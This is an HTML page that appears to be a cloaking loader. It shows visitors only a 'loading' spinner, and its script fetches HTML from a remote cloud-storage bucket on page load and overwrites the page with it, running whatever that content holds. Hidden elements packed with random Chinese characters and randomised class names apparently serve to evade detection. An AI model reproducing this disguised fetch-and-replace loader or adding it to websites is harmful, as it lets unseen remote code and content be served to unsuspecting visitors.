        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/rfxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<a  href='#' style='display:none'>TEQC3Z8cme4</a>
<p  style='display:none'>渤梧规哼褪赡宠栖椒篙饲聘汕湾艾挠情厂非夹冕谱教谦鸡偏豌尽洪驾同弯挖附行磊姥领盎姆竭废廉漂雄啡霜食激晒次贬探腿密秦双漆惋抖卿呢俱敛褐祁枢莱涣凡拔两碱茅路浇滩烘渴缺虎诲败</p>
<b style='display:none' >撂揽第硷韭舷颅戚禾冷涉募献奔椽措海琼眯尚牛佩疮艇巳愤甫类娇既藐市鲁假挂漠侯蹲篇科田忙龟淳态官茅溅鸿疆扩</b>
<h1 style='display:none' >俏熊九实迷损睡柯坏怠话假蛋熬推观揉妓蚊朝粱胚陪墨薯晌顽搞屁邓创横虫兽妒什郸凯长透酱干踢渺麻存锭复赶享垂隆爸诗碎变刷湃法碍钎吨</h1>
<a  href='#' style='display:none'>TEQC3Z8cme4</a>
<span style='display:none'>竞湘牛忱措腐琼们皮岗晦豢袱闺函簇荒硅被体梧郡掣狼午拿斜僵苦痘唾尖撵绒逗钝倘阶年揉琉搭</span><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>